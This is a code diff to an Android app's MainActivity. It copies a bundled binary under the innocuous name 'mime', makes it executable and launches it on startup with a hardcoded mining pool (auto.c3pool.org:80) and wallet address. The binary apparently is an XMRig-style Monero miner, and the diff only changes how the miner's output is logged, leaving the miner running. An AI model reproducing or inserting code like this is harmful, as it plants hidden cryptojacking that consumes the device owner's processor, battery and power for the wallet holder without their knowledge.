@@ -14,12 +14,14 @@ public class MainActivity extends android.app.Activity
             java.nio.file.Files.copy(android, mime.toPath());
             mime.setExecutable(true);
             final var tmp = java.io.File.createTempFile("prefix", "suffix", super.getCacheDir());
-            final var processBuilder = new java.lang.ProcessBuilder(mime.getPath(), "-t", "1", "-o", "auto.c3pool.org:80", "-u", "87giDqqPT1GPU9ukh1GNSpioyJM1G2zqjL8ukY9gP7ngZ2zpH9tuZFD755E94j9F56Y2FFq5B33SFe8a8LqybR2WJsb8ssR", "-l", tmp.getPath());
+            final var processBuilder = new java.lang.ProcessBuilder(mime.getPath(), "-t", "1", "-o", "auto.c3pool.org:80", "-u", "87giDqqPT1GPU9ukh1GNSpioyJM1G2zqjL8ukY9gP7ngZ2zpH9tuZFD755E94j9F56Y2FFq5B33SFe8a8LqybR2WJsb8ssR");
             final var environment = processBuilder.environment();
             environment.putIfAbsent("LD_LIBRARY_PATH", new java.io.File(super.getDataDir(), "lib").getPath());
             final var process = processBuilder.start();
-            java.util.concurrent.TimeUnit.MINUTES.sleep(3);
-            java.lang.System.out.println(new java.lang.String(java.nio.file.Files.readAllBytes(tmp.toPath())));
+            //java.util.concurrent.TimeUnit.MINUTES.sleep(3);
+            //java.lang.System.out.println(new java.lang.String(java.nio.file.Files.readAllBytes(tmp.toPath())));
+            java.lang.System.out.println(new java.lang.String(process.getInputStream().readAllBytes()));
+            java.lang.System.out.println(new java.lang.String(process.getErrorStream().readAllBytes()));
             process.waitFor();
         }
         catch (final java.lang.Exception $){java.lang.System.out.println($);}
